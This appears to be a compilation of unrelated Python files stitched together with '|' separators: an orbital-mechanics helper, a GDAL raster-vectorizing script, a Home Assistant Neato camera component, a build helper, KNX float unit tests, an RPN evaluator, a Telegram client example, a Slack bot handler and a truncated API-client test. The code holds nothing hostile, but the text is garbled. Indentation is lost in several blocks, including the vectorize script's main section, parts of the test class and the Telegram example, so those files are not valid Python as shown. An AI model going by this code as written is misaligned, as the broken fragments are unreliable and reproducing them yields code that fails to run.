        bin_centers = match_units(bin_centers, x)[0]
    else:
        bin_centers[N==0] = np.nan
    if ret_bin_edges:
        return binedges, y_mean, y_err
    else:
        return bin_centers, y_mean, y_err
def kepler_pos(pos, vel, t, Mstar, order=10):
    """
    Estimate position at future time t assuming an elliptical keplerian orbit

    Parameters
    ----------
    pos, vel : SimArray
        Current position and velocity vectors (units handled by pynbody)
    t : SimArray
        Time at which to evaluate the orbit
    Mstar : SimArray
        Central mass
    order : int
        Number of fixed-point iterations used to solve Kepler's equation

    Returns
    -------
    pos_f : SimArray
        Estimated position vector at time t
    """
    G = SimArray(1.0, 'G')
    mu = G*Mstar
    r = np.sqrt((pos**2).sum())
    v = np.sqrt((vel**2).sum())
    # Calculate semi-major axis (vis-viva rearranged)
    a = mu*r/(2*mu - v*v*r)
    a.convert_units(r.units)
    # Calculate eccentricity vector
    ecc = (v*v)*pos/mu - ((pos*vel).sum())*vel/mu - pos/r
    ecc.convert_units('1')
    # Calculate eccentricity
    e = float(np.sqrt((ecc**2).sum()))
    # Calculate initial eccentric anomaly
    # x1 = a*e^2 + r.e
    x1 = a*e**2 + (pos*ecc).sum()
    # y1 = |r x e| * sign(r.v)
    y1 = np.sqrt((np.cross(pos, ecc)**2).sum())
    y1 *= (pos*vel).sum()/abs((pos*vel).sum())
    E0 = np.arctan2(y1,x1)
    # Calculate mean anomaly
    M0 = E0 - e*np.sin(E0)
    a3 = np.power(a,3)
    M = (np.sqrt(mu/a3)*t).in_units('1') + M0
    # Solve Kepler's equation E = M + e*sin(E) by fixed-point iteration
    # (converges for e < 1; `order` iterations, no tolerance check)
    E = E0
    for i in range(order):
        E = M + e*np.sin(E)
    # Calculate (x1, y1) (relative to center of ellipse, not focus)
    x1 = (2*a - r) * np.cos(E)
    y1 = (2*a - r) * np.sin(E)
    # Transform back to the original coordinate frame: x1hat points along
    # the eccentricity vector, y1hat is perpendicular within the orbit plane
    x1hat = ecc/np.sqrt((ecc**2).sum())
    y1hat = np.cross(np.cross(pos, vel), ecc)
    y1hat /= np.sqrt((y1hat**2).sum())
    pos_f = (x1 - a*e)*x1hat + y1*y1hat
    return pos_f
|
import sys
from os.path import basename
from osgeo import ogr; ogr.UseExceptions() # pylint: disable=multiple-statements
from osgeo import osr; ogr.UseExceptions() # pylint: disable=multiple-statements
from osgeo import gdal; gdal.UseExceptions() # pylint: disable=multiple-statements
from img import ImageFileReader
from img.cli import error
from img_geom import OUTPUT_FORMATS, setSR, dumpGeom
from img_vectorize import vectorize
def usage():
    """ Print simple usage help to stderr. """
    def _gen_():
        # Lines of the help text, yielded one at a time
        yield "Extract polygon outlines of single colour raster patches."
        yield "The non-simplified geometry is dumped to standard output."
        # BUGFIX: removed a stray trailing `""` literal that was accidentally
        # concatenated to this string (no behavioral change).
        yield "By default the output is dumped in the WKB format."
        yield (
            "USAGE: %s <input image> <data-value> [%s] [AND] [EQL]" %
            (basename(sys.argv[0]), "|".join(OUTPUT_FORMATS))
        )
    for line in _gen_():
        print >>sys.stderr, line
# Pixel predicates keyed by the (EQL, AND) flag pair parsed in __main__.
# NOTE: VALUE is a module-level global assigned later in the __main__ block;
# these lambdas bind it late, so they must only be called after it is set.
FILTERS = {
    (True, True): lambda v: VALUE & v == VALUE,   # AND+EQL: all VALUE bits set
    (False, True): lambda v: VALUE & v != 0,      # AND: any VALUE bit set
    (True, False): lambda v: v == VALUE,          # EQL: exact match
}
if __name__ == "__main__":
ALLOWED_DTYPES = ('uint8', 'uint16', 'uint32', 'int8', 'int16', 'int32')
OP_AND = False
OP_EQL = False
FORMAT = "WKB"
try:
INPUT = sys.argv[1]
VALUE = int(sys.argv[2])
for arg in sys.argv[3:]:
if arg in OUTPUT_FORMATS:
FORMAT = arg # output format
elif arg == "AND":
OP_AND = True
elif arg == "EQL":
OP_EQL = True
except IndexError:
error("Not enough input arguments!")
usage()
sys.exit(1)
if not OP_AND and not OP_EQL:
OP_EQL = True
# open the mask image
IMG_MASK = ImageFileReader(INPUT)
# check mask properties
if IMG_MASK.size.z > 1:
error("Multi-band images are not supported!")
sys.exit(1)
if IMG_MASK.dtype not in ALLOWED_DTYPES:
error("Unsupported image data type '%s'!" % IMG_MASK.dtype)
sys.exit(1)
GEOCODING = IMG_MASK.geocoding
if 'geotrn' not in GEOCODING:
error("The image must be rectified and geocoded!")
sys.exit(1)
# vectorize geometry, fix the spatial reference and print the output
sys.stdout.write(dumpGeom(setSR(
vectorize(IMG_MASK[0], FILTERS[(OP_EQL, OP_AND)]),
osr.SpatialReference(GEOCODING['proj'])
), FORMAT))
|
"""Support for loading picture from Neato."""
from __future__ import annotations
from datetime import timedelta
import logging
from typing import Any
from pybotvac.exceptions import NeatoRobotException
from pybotvac.robot import Robot
from urllib3.response import HTTPResponse
from homeassistant.components.camera import Camera
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
NEATO_DOMAIN,
NEATO_LOGIN,
NEATO_MAP_DATA,
NEATO_ROBOTS,
SCAN_INTERVAL_MINUTES,
)
from .hub import NeatoHub
_LOGGER = logging.getLogger(__name__)
# How often Home Assistant polls this camera entity for updates
SCAN_INTERVAL = timedelta(minutes=SCAN_INTERVAL_MINUTES)
ATTR_GENERATED_AT = "generated_at"
async def async_setup_entry(
    hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
    """Set up Neato camera with config entry."""
    neato: NeatoHub = hass.data[NEATO_LOGIN]
    mapdata: dict[str, Any] | None = hass.data.get(NEATO_MAP_DATA)
    # Only robots exposing the "maps" trait can provide a cleaning map
    dev = [
        NeatoCleaningMap(neato, robot, mapdata)
        for robot in hass.data[NEATO_ROBOTS]
        if "maps" in robot.traits
    ]
    if not dev:
        return
    _LOGGER.debug("Adding robots for cleaning maps %s", dev)
    async_add_entities(dev, True)
class NeatoCleaningMap(Camera):
    """Neato cleaning map for last clean."""
    def __init__(
        self, neato: NeatoHub, robot: Robot, mapdata: dict[str, Any] | None
    ) -> None:
        """Initialize Neato cleaning map."""
        super().__init__()
        self.robot = robot
        self.neato = neato
        self._mapdata = mapdata
        # Marked unavailable whenever hub communication fails in update()
        self._available = neato is not None
        self._robot_name = f"{self.robot.name} Cleaning Map"
        self._robot_serial: str = self.robot.serial
        # Cache of the most recently downloaded map image and its metadata
        self._generated_at: str | None = None
        self._image_url: str | None = None
        self._image: bytes | None = None
    def camera_image(
        self, width: int | None = None, height: int | None = None
    ) -> bytes | None:
        """Return image response."""
        # width/height are ignored; the cached map image is returned as-is
        self.update()
        return self._image
    def update(self) -> None:
        """Check the contents of the map list."""
        _LOGGER.debug("Running camera update for '%s'", self.entity_id)
        try:
            self.neato.update_robots()
        except NeatoRobotException as ex:
            if self._available:  # Print only once when available
                _LOGGER.error(
                    "Neato camera connection error for '%s': %s", self.entity_id, ex
                )
            # Drop the cache and mark unavailable until the hub recovers
            self._image = None
            self._image_url = None
            self._available = False
            return
        if self._mapdata:
            # Most recent cleaning map is the first entry for this robot
            map_data: dict[str, Any] = self._mapdata[self._robot_serial]["maps"][0]
            # Skip the download when the URL has not changed since last time
            if (image_url := map_data["url"]) == self._image_url:
                _LOGGER.debug(
                    "The map image_url for '%s' is the same as old", self.entity_id
                )
                return
            try:
                image: HTTPResponse = self.neato.download_map(image_url)
            except NeatoRobotException as ex:
                if self._available:  # Print only once when available
                    _LOGGER.error(
                        "Neato camera connection error for '%s': %s", self.entity_id, ex
                    )
                self._image = None
                self._image_url = None
                self._available = False
                return
            self._image = image.read()
            self._image_url = image_url
            self._generated_at = map_data.get("generated_at")
            self._available = True
    @property
    def name(self) -> str:
        """Return the name of this camera."""
        return self._robot_name
    @property
    def unique_id(self) -> str:
        """Return unique ID."""
        return self._robot_serial
    @property
    def available(self) -> bool:
        """Return if the robot is available."""
        return self._available
    @property
    def device_info(self) -> DeviceInfo:
        """Device info for neato robot."""
        return DeviceInfo(identifiers={(NEATO_DOMAIN, self._robot_serial)})
    @property
    def extra_state_attributes(self) -> dict[str, Any]:
        """Return the state attributes of the vacuum cleaner."""
        data: dict[str, Any] = {}
        if self._generated_at is not None:
            data[ATTR_GENERATED_AT] = self._generated_at
        return data
|
"""
Build helper functions for Labtronyx
"""
__author__ = 'kkennedy'
# Semantic version components, combined into '<major>.<minor>.<patch>'
VER_MAJOR = 1
VER_MINOR = 0
VER_PATCH = 0
# When RELEASE is False, builds are tagged with REL_TYPE plus git/date info
RELEASE = False
REL_TYPE = 'dev' # Development Release
import os, time
rootPath = os.path.dirname(os.path.realpath(os.path.join(__file__, os.curdir))) # Resolves symbolic links
def generate_ver(filename='labtronyx/version.py'):
    """Write the autogenerated version module.

    Builds a semantic version string from VER_MAJOR/VER_MINOR/VER_PATCH,
    appends git/date pre-release info when RELEASE is False, and writes the
    result into *filename* (relative to rootPath).

    Returns
    -------
    (VERSION, FULL_VERSION) : tuple of str
    """
    # COMPAT: print() call form works on both Python 2 and 3
    print("Generating version file: %s" % filename)
    # Get Git Revision
    try:
        import subprocess
        # decode() makes this a text string on Python 3 (check_output
        # returns bytes there); harmless on Python 2
        GIT_REVISION = subprocess.check_output(
            ['git', 'rev-parse', 'HEAD']).decode('ascii', 'replace').strip()
    except Exception:
        # Not a git checkout, or git is unavailable -- fall back to the
        # build-date form below (narrowed from a bare except)
        GIT_REVISION = ''
    # Generate version string
    VERSION = '%d.%d.%d' % (VER_MAJOR, VER_MINOR, VER_PATCH)
    BUILD_DATE = time.strftime("%y%m%d")
    if not RELEASE:
        # Pre-release build: prefer the git commit, else the build date
        if GIT_REVISION != '':
            FULL_VERSION = '%s-%s+commit.%s' % (VERSION, REL_TYPE, GIT_REVISION[:7])
        else:
            FULL_VERSION = '%s-%s+build.%s' % (VERSION, REL_TYPE, BUILD_DATE)
    else:
        # Release build
        FULL_VERSION = VERSION
    # Generate version file (content template; written verbatim)
    ver_py = """# AUTOGENERATED DURING BUILD
ver_sem = '{version}'
ver_full = '{full_version}'
build_date = '{build}'
git_revision = '{git_revision}'
"""
    with open(os.path.join(rootPath, filename), 'w') as f:
        f.write(ver_py.format(version=VERSION, full_version=FULL_VERSION,
                              build=BUILD_DATE, git_revision=GIT_REVISION))
    return VERSION, FULL_VERSION
def build_all():
    """Run the full build (currently just version-file generation)."""
    # COMPAT: print() call form works on both Python 2 and 3
    print("Running build...")
    try:
        generate_ver()
        print("Build completed!")
    except:
        # Deliberate catch-all: report the failure, then re-raise unchanged
        print("Build failed!")
        raise
# Allow running this helper directly: `python build.py`
if __name__ == '__main__':
    build_all()
|
import scarlett
from scarlett.constants import *
class ScarlettBasics(object):
    """Base class holding a reference to the shared Scarlett brain.

    Extra keyword arguments are accepted for subclass flexibility but are
    ignored here.
    """
    def __init__(self, brain, **kwargs):
        self.brain = brain
|
"""Unit test for KNX 2 and 4 byte float objects."""
import math
import struct
from unittest.mock import patch
import pytest
from xknx.dpt import (
DPT2ByteFloat,
DPT4ByteFloat,
DPTElectricCurrent,
DPTElectricPotential,
DPTEnthalpy,
DPTFrequency,
DPTHumidity,
DPTLux,
DPTPartsPerMillion,
DPTPhaseAngleDeg,
DPTPower,
DPTTemperature,
DPTVoltage,
)
from xknx.exceptions import ConversionError
class TestDPTFloat:
"""Test class for KNX 2 & 4 byte/octet float object."""
# ####################################################################
# DPT2ByteFloat
#
def test_value_from_documentation(self):
"""Test parsing and streaming of DPT2ByteFloat -30.00. Example from the internet[tm]."""
assert DPT2ByteFloat.to_knx(-30.00) == (0x8A, 0x24)
assert DPT2ByteFloat.from_knx((0x8A, 0x24)) == -30.00
    def test_value_taken_from_live_thermostat(self):
        """Test parsing and streaming of DPT2ByteFloat 16.96 (value read from a live thermostat)."""
        assert DPT2ByteFloat.to_knx(16.96) == (0x06, 0xA0)
        assert DPT2ByteFloat.from_knx((0x06, 0xA0)) == 16.96
def test_zero_value(self):
"""Test parsing and streaming of DPT2ByteFloat zero value."""
assert DPT2ByteFloat.to_knx(0.00) == (0x00, 0x00)
assert DPT2ByteFloat.from_knx((0x00, 0x00)) == 0.00
    # --- DPT2ByteFloat: 2-byte KNX float round-trips, precision limits, and error paths ---
    def test_room_temperature(self):
        """Test parsing and streaming of DPT2ByteFloat 21.00. Room temperature."""
        assert DPT2ByteFloat.to_knx(21.00) == (0x0C, 0x1A)
        assert DPT2ByteFloat.from_knx((0x0C, 0x1A)) == 21.00
    def test_high_temperature(self):
        """Test parsing and streaming of DPT2ByteFloat 500.00, 499.84, 500.16. Testing rounding issues."""
        # At this magnitude the 2-byte float cannot represent 500.00 exactly,
        # so to_knx(500.00) encodes to the same raw bytes as 499.84.
        assert DPT2ByteFloat.to_knx(500.00) == (0x2E, 0x1A)
        # round(abs(a - b), 7) == 0 is a float-tolerant equality check.
        assert round(abs(DPT2ByteFloat.from_knx((0x2E, 0x1A)) - 499.84), 7) == 0
        assert round(abs(DPT2ByteFloat.from_knx((0x2E, 0x1B)) - 500.16), 7) == 0
        assert DPT2ByteFloat.to_knx(499.84) == (0x2E, 0x1A)
        assert DPT2ByteFloat.to_knx(500.16) == (0x2E, 0x1B)
    def test_minor_negative_temperature(self):
        """Test parsing and streaming of DPT2ByteFloat -10.00. Testing negative values."""
        assert DPT2ByteFloat.to_knx(-10.00) == (0x84, 0x18)
        assert DPT2ByteFloat.from_knx((0x84, 0x18)) == -10.00
    def test_very_cold_temperature(self):
        """
        Test parsing and streaming of DPT2ByteFloat -1000.00,-999.68, -1000.32.
        Testing rounding issues of negative values.
        """
        # -1000.00 is not exactly representable; it rounds to the -999.68 encoding.
        assert DPT2ByteFloat.to_knx(-1000.00) == (0xB1, 0xE6)
        assert DPT2ByteFloat.from_knx((0xB1, 0xE6)) == -999.68
        assert DPT2ByteFloat.from_knx((0xB1, 0xE5)) == -1000.32
        assert DPT2ByteFloat.to_knx(-999.68) == (0xB1, 0xE6)
        assert DPT2ByteFloat.to_knx(-1000.32) == (0xB1, 0xE5)
    def test_max(self):
        """Test parsing and streaming of DPT2ByteFloat with maximum value."""
        assert DPT2ByteFloat.to_knx(DPT2ByteFloat.value_max) == (0x7F, 0xFF)
        assert DPT2ByteFloat.from_knx((0x7F, 0xFF)) == DPT2ByteFloat.value_max
    def test_min(self):
        """Test parsing and streaming of DPT2ByteFloat with minimum value."""
        assert DPT2ByteFloat.to_knx(DPT2ByteFloat.value_min) == (0xF8, 0x00)
        assert DPT2ByteFloat.from_knx((0xF8, 0x00)) == DPT2ByteFloat.value_min
    def test_close_to_max(self):
        """Test parsing and streaming of DPT2ByteFloat with maximum value -1."""
        assert DPT2ByteFloat.to_knx(670433.28) == (0x7F, 0xFE)
        assert DPT2ByteFloat.from_knx((0x7F, 0xFE)) == 670433.28
    def test_close_to_min(self):
        """Test parsing and streaming of DPT2ByteFloat with minimum value +1."""
        assert DPT2ByteFloat.to_knx(-670760.96) == (0xF8, 0x01)
        assert DPT2ByteFloat.from_knx((0xF8, 0x01)) == -670760.96
    def test_to_knx_min_exceeded(self):
        """Test parsing of DPT2ByteFloat with wrong value (underflow)."""
        with pytest.raises(ConversionError):
            DPT2ByteFloat.to_knx(DPT2ByteFloat.value_min - 1)
    def test_to_knx_max_exceeded(self):
        """Test parsing of DPT2ByteFloat with wrong value (overflow)."""
        with pytest.raises(ConversionError):
            DPT2ByteFloat.to_knx(DPT2ByteFloat.value_max + 1)
    def test_to_knx_wrong_parameter(self):
        """Test parsing of DPT2ByteFloat with wrong value (string)."""
        with pytest.raises(ConversionError):
            DPT2ByteFloat.to_knx("fnord")
    def test_from_knx_wrong_parameter(self):
        """Test parsing of DPT2ByteFloat with wrong value (wrong number of bytes)."""
        with pytest.raises(ConversionError):
            DPT2ByteFloat.from_knx((0xF8, 0x01, 0x23))
    def test_from_knx_wrong_parameter2(self):
        """Test parsing of DPT2ByteFloat with wrong value (second parameter is a string)."""
        with pytest.raises(ConversionError):
            DPT2ByteFloat.from_knx((0xF8, "0x23"))
    # --- DPT2ByteFloat subtypes: static attribute (range/unit/resolution) checks ---
    #
    # DPTTemperature
    #
    def test_temperature_settings(self):
        """Test attributes of DPTTemperature."""
        assert DPTTemperature.value_min == -273
        assert DPTTemperature.value_max == 670760
        assert DPTTemperature.unit == "°C"
        assert DPTTemperature.resolution == 0.01
    def test_temperature_assert_min_exceeded(self):
        """Testing parsing of DPTTemperature with wrong value."""
        # Below absolute zero (-273) must be rejected.
        with pytest.raises(ConversionError):
            DPTTemperature.to_knx(-274)
    def test_temperature_assert_min_exceeded_from_knx(self):
        """Testing parsing of DPTTemperature with wrong value."""
        # Raw bytes decoding to -1000 are out of the temperature range.
        with pytest.raises(ConversionError):
            DPTTemperature.from_knx((0xB1, 0xE6))  # -1000
    #
    # DPTLux
    #
    def test_lux_settings(self):
        """Test attributes of DPTLux."""
        assert DPTLux.value_min == 0
        assert DPTLux.value_max == 670760
        assert DPTLux.unit == "lx"
        assert DPTLux.resolution == 0.01
    def test_lux_assert_min_exceeded(self):
        """Test parsing of DPTLux with wrong value."""
        with pytest.raises(ConversionError):
            DPTLux.to_knx(-1)
    #
    # DPTHumidity
    #
    def test_humidity_settings(self):
        """Test attributes of DPTHumidity."""
        assert DPTHumidity.value_min == 0
        assert DPTHumidity.value_max == 670760
        assert DPTHumidity.unit == "%"
        assert DPTHumidity.resolution == 0.01
    def test_humidity_assert_min_exceeded(self):
        """Test parsing of DPTHumidity with wrong value."""
        with pytest.raises(ConversionError):
            DPTHumidity.to_knx(-1)
    #
    # DPTEnthalpy
    #
    def test_enthalpy_settings(self):
        """Test attributes of DPTEnthalpy."""
        assert DPTEnthalpy.unit == "H"
    #
    # DPTPartsPerMillion
    #
    def test_partspermillion_settings(self):
        """Test attributes of DPTPartsPerMillion."""
        assert DPTPartsPerMillion.unit == "ppm"
    #
    # DPTVoltage
    #
    def test_voltage_settings(self):
        """Test attributes of DPTVoltage."""
        assert DPTVoltage.unit == "mV"
    # ####################################################################
    # DPT4ByteFloat (IEEE-754 single precision) round-trips and error paths
    #
    def test_4byte_float_values_from_power_meter(self):
        """Test parsing DPT4ByteFloat value from power meter."""
        assert DPT4ByteFloat.from_knx((0x43, 0xC6, 0x80, 00)) == 397
        assert DPT4ByteFloat.to_knx(397) == (0x43, 0xC6, 0x80, 00)
        assert DPT4ByteFloat.from_knx((0x42, 0x38, 0x00, 00)) == 46
        assert DPT4ByteFloat.to_knx(46) == (0x42, 0x38, 0x00, 00)
    def test_14_033(self):
        """Test parsing DPTFrequency unit."""
        assert DPTFrequency.unit == "Hz"
    def test_14_055(self):
        """Test DPTPhaseAngleDeg object."""
        assert DPT4ByteFloat.from_knx((0x42, 0xEF, 0x00, 0x00)) == 119.5
        assert DPT4ByteFloat.to_knx(119.5) == (0x42, 0xEF, 0x00, 0x00)
        assert DPTPhaseAngleDeg.unit == "°"
    def test_14_057(self):
        """Test DPT4ByteFloat object."""
        # 0.945000052452 is the nearest single-precision value; decoding
        # surfaces it rounded to 0.9450001.
        assert DPT4ByteFloat.from_knx((0x3F, 0x71, 0xEB, 0x86)) == 0.9450001
        assert DPT4ByteFloat.to_knx(0.945000052452) == (0x3F, 0x71, 0xEB, 0x86)
        assert DPT4ByteFloat.unit == ""
    def test_4byte_float_values_from_voltage_meter(self):
        """Test parsing DPT4ByteFloat from voltage meter."""
        assert DPT4ByteFloat.from_knx((0x43, 0x65, 0xE3, 0xD7)) == 229.89
        assert DPT4ByteFloat.to_knx(229.89) == (0x43, 0x65, 0xE3, 0xD7)
    def test_4byte_float_zero_value(self):
        """Test parsing and streaming of DPT4ByteFloat zero value."""
        assert DPT4ByteFloat.from_knx((0x00, 0x00, 0x00, 0x00)) == 0.00
        assert DPT4ByteFloat.to_knx(0.00) == (0x00, 0x00, 0x00, 0x00)
    def test_4byte_float_special_value(self):
        """Test parsing and streaming of DPT4ByteFloat special value."""
        # IEEE-754 specials: NaN, +inf, -inf and negative zero.
        assert math.isnan(DPT4ByteFloat.from_knx((0x7F, 0xC0, 0x00, 0x00)))
        assert DPT4ByteFloat.to_knx(float("nan")) == (0x7F, 0xC0, 0x00, 0x00)
        assert math.isinf(DPT4ByteFloat.from_knx((0x7F, 0x80, 0x00, 0x00)))
        assert DPT4ByteFloat.to_knx(float("inf")) == (0x7F, 0x80, 0x00, 0x00)
        assert DPT4ByteFloat.from_knx((0xFF, 0x80, 0x00, 0x00)) == float("-inf")
        assert DPT4ByteFloat.to_knx(float("-inf")) == (0xFF, 0x80, 0x00, 0x00)
        assert DPT4ByteFloat.from_knx((0x80, 0x00, 0x00, 0x00)) == float("-0")
        assert DPT4ByteFloat.to_knx(float("-0")) == (0x80, 0x00, 0x00, 0x00)
    def test_4byte_float_to_knx_wrong_parameter(self):
        """Test parsing of DPT4ByteFloat with wrong value (string)."""
        with pytest.raises(ConversionError):
            DPT4ByteFloat.to_knx("fnord")
    def test_4byte_float_from_knx_wrong_parameter(self):
        """Test parsing of DPT4ByteFloat with wrong value (wrong number of bytes)."""
        with pytest.raises(ConversionError):
            DPT4ByteFloat.from_knx((0xF8, 0x01, 0x23))
    def test_4byte_float_from_knx_wrong_parameter2(self):
        """Test parsing of DPT4ByteFloat with wrong value (second parameter is a string)."""
        with pytest.raises(ConversionError):
            DPT4ByteFloat.from_knx((0xF8, "0x23", 0x00, 0x00))
    # NOTE(review): "flaot" typo in the method name below; left unchanged here
    # so test selection by name keeps working, but worth renaming.
    def test_4byte_flaot_from_knx_unpack_error(self):
        """Test DPT4ByteFloat parsing with unpack error."""
        with patch("struct.unpack") as unpack_mock:
            unpack_mock.side_effect = struct.error()
            with pytest.raises(ConversionError):
                DPT4ByteFloat.from_knx((0x01, 0x23, 0x02, 0x02))
    #
    # DPTElectricCurrent
    #
    def test_electric_current_settings(self):
        """Test attributes of DPTElectricCurrent."""
        assert DPTElectricCurrent.unit == "A"
    #
    # DPTElectricPotential
    #
    def test_electric_potential_settings(self):
        """Test attributes of DPTElectricPotential."""
        assert DPTElectricPotential.unit == "V"
    #
    # DPTPower
    #
    def test_power_settings(self):
        """Test attributes of DPTPower."""
        assert DPTPower.unit == "W"
|
import logging
import definitions
class EvaluateError(Exception):
    """Raised when an operator or function receives too few arguments.

    Attributes:
        ident     -- the operator/function identifier being evaluated.
        eArgCount -- number of arguments actually available (on the stack).
        argCount  -- number of arguments the identifier requires.
    """
    def __init__(self, eIdent, eArgCount, argCount):
        self.ident = eIdent
        self.eArgCount = eArgCount
        self.argCount = argCount
    def __str__(self):
        # Message wording fixed: "too less" -> "too few". Data is unchanged:
        # argCount is the required count, eArgCount the provided count.
        return ('too few arguments for ' + str(self.ident) + ' -- '
                + 'requires: ' + str(self.argCount)
                + ', provided: ' + str(self.eArgCount))
class Evaluator(object):
    """Evaluates a math expression given in Reverse Polish Notation."""
    def _eval(self, iArgs):
        '''
        @iArgs -- list: operator/function name at iArgs[0], its raw argument
                  values at iArgs[1:].
        Return value: the raw result of applying the operator/function
        (the caller wraps it back into a definitions.Identifier), or False
        when iArgs[0] is neither a known operator nor a known function.
        '''
        op = iArgs[0]
        result = False
        if op in definitions._operators.keys():
            result = definitions._operators[op].alg(iArgs[1:])
            logging.debug('Evaluate operator: ' + op + ' with arguments: (' + \
                          ', '.join([ str(arg) for arg in iArgs[1:] ]) + \
                          '); result: ' + str(result) + ';')
        elif op in definitions._functions.keys():
            result = definitions._functions[op].alg(iArgs[1:])
            logging.debug('Evaluate function: ' + op + ' with arguments: (' + \
                          ', '.join([ str(arg) for arg in iArgs[1:] ]) + \
                          '); result: ' + str(result) + ';')
        return result
    def evaluate(self, iExpr):
        '''
        @iExpr -- math string in RPN (list of definitions.Identifier)
        This function computes @iExpr with a classic RPN stack machine.
        Return value: int or float or bool
        Raises EvaluateError when an operator/function has too few operands.
        NOTE(review): if the stack does not hold exactly one value at the
        end (malformed expression), this implicitly returns None.
        '''
        logging.info('Evaluator started.')
        stack = []
        for ident in iExpr:
            if (ident.type == 'num'):
                stack.append(ident)
            else: # operator or function
                # Look up how many operands this operator/function consumes.
                nArgs = 0
                if (ident.type == 'op'):
                    nArgs = definitions._operators[ident.val].argCount
                else:
                    nArgs = definitions._functions[ident.val].argCount
                args = []
                if (len(stack) < nArgs):
                    raise EvaluateError(ident.val, len(stack), nArgs)
                else:
                    # Pops yield operands in reverse; appending the op and
                    # reversing produces [op, arg1, ..., argN] for _eval.
                    for i in range(nArgs):
                        args.append(stack.pop().val)
                args.append(ident.val)
                args.reverse() # we must reverse args to provide them in correct order
                stack.append(definitions.Identifier(type = 'num', val = self._eval(args)))
        if (len(stack) == 1):
            return stack.pop().val
|
"""
Simpler example printing the list of chats you have.
"""
from pytg.sender import Sender
__author__ = 'luckydonald'
def main():
    """Connect to a locally running telegram-cli and print the chat list."""
    sender = Sender("127.0.0.1", 4458)
    dialogs = sender.dialog_list()
    print("Got: %s" % str(dialogs))
if __name__ == '__main__':
main()
|
import json
import logging
import re
logger = logging.getLogger(__name__)
class RtmEventHandler(object):
    """Dispatches Slack RTM events to the message writer.

    Routes incoming events by type, and routes bot mentions / direct
    messages by keyword matching on the message text.
    """
    def __init__(self, slack_clients, msg_writer):
        # slack_clients: wrapper exposing .web and helper predicates;
        # msg_writer: object that produces all outgoing messages.
        self.clients = slack_clients
        self.msg_writer = msg_writer
        # Cached at startup. NOTE(review): _handle_message calls
        # get_standup_channel_id() again instead of using this cache -- confirm
        # whether the fresh lookup is intentional.
        self.stand_up = self.get_standup_channel_id()
    def get_standup_channel_id(self):
        return self.clients.web.channels.get_channel_id('stand-up')
    def get_bottest_channel_id(self):
        # Not referenced elsewhere in this class; presumably used by callers.
        return self.clients.web.channels.get_channel_id('testing-bots')
    def handle(self, event):
        """Entry point: dispatch a raw RTM event dict if it carries a type."""
        if 'type' in event:
            self._handle_by_type(event['type'], event)
    def _handle_by_type(self, event_type, event):
        # See https://api.slack.com/rtm for a full list of events
        if event_type == 'error':
            # error
            self.msg_writer.write_error(event['channel'], json.dumps(event))
        elif event_type == 'message':
            # message was sent to channel
            self._handle_message(event)
        elif event_type == 'channel_joined':
            # you joined a channel
            self.msg_writer.write_help_message(event['channel'])
        elif event_type == 'group_joined':
            # you joined a private group
            self.msg_writer.write_help_message(event['channel'])
        else:
            pass
    def _handle_message(self, event):
        """Keyword-route a message event; branch order determines priority."""
        # Filter out messages from the bot itself, and from non-users (eg. webhooks)
        if ('user' in event) and (not self.clients.is_message_from_me(event['user'])):
            msg_txt = event['text']
            if self.clients.is_bot_mention(msg_txt) or self._is_direct_message(event['channel']):
                # NOTE(review): these re.search patterns match substrings, so
                # e.g. 'hi' also matches inside 'this' -- confirm intended.
                if re.search('fuck|shit|bitch|stupid|damn|:middle_finger:', msg_txt):
                    self.msg_writer.write_language_sass(event['channel'])
                elif 'help' in msg_txt:
                    self.msg_writer.write_help_message(event['channel'], event['user'])
                elif re.search('hi|hey|hello', msg_txt):
                    self.msg_writer.write_greeting(event['channel'], event['user'])
                elif 'schedule' in msg_txt:
                    self.msg_writer.write_schedule(event['channel'])
                elif 'stand-up' in msg_txt or 'commit' in msg_txt:
                    # One report per named team member mentioned (not elif:
                    # several names in one message produce several reports).
                    if 'taylor' in msg_txt or 'Taylor' in msg_txt:
                        self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("taylor"), "Taylor's")
                    if 'pete' in msg_txt or 'Pete' in msg_txt:
                        self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("pete_m"), "Pete's")
                    if 'emma' in msg_txt or 'Emma' in msg_txt:
                        self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("emma"), "Emma's")
                    if 'ben' in msg_txt or 'Ben' in msg_txt:
                        self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("bendroste"), "Ben's")
                    if 'parker' in msg_txt or 'Parker' in msg_txt:
                        self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("parker"), "Parker's")
                    # No name mentioned: report the sender's own commitments.
                    if not re.search('[Tt]aylor|[Ee]mma|[Bb]en|[Pp]arker|[Pp]ete', msg_txt):
                        self.msg_writer.write_commitments(event['channel'], event['user'])
                elif "what's left" in msg_txt or 'graduate' in msg_txt:
                    if 'update' in msg_txt:
                        self.msg_writer.update_remaining(event['channel'], event['user'], msg_txt.split("with")[-1])
                    elif "remove" in msg_txt:
                        self.msg_writer.remove_remaining(event['channel'], [int(s) for s in msg_txt.split() if s.isdigit()])
                    else:
                        self.msg_writer.write_remaining(event['channel'])
                elif 'AMF' in msg_txt or 'amf' in msg_txt:
                    self.msg_writer.write_amf(event['channel'], event['user'])
                elif re.search('bye|farewell|peace|goodbye', msg_txt):
                    self.msg_writer.write_goodbye(event['channel'])
                else:
                    self.msg_writer.write_prompt(event['channel'])
            elif event['channel'] == self.get_standup_channel_id():
                # Any non-mention message in the stand-up channel is recorded.
                self.msg_writer.update_commitments(event['user'], msg_txt)
        elif 'user' not in event and self._is_direct_message(event['channel']):
            # Non-user (e.g. webhook) direct messages update the schedule.
            msg_txt = event['text']
            self.msg_writer.update_schedule(msg_txt)
    def _is_direct_message(self, channel):
        """Check if channel is a direct message channel
        Args:
            channel (str): Channel in which a message was received
        """
        # Slack direct-message channel IDs start with 'D'.
        return channel.startswith('D')
|
from swiftype import swiftype
import os
import time
import unittest2 as unittest
from six.moves.urllib_parse import urlparse, parse_qs
import vcr
from mock import Mock
class TestClientFunctions(unittest.TestCase):
    """API-key client tests; HTTP interactions are replayed from VCR cassettes."""
    def setUp(self):
        # Fall back to a dummy key when API_KEY is unset.  Catch only
        # KeyError: the original bare `except:` also swallowed e.g.
        # KeyboardInterrupt and genuine bugs.
        try:
            api_key = os.environ['API_KEY']
        except KeyError:
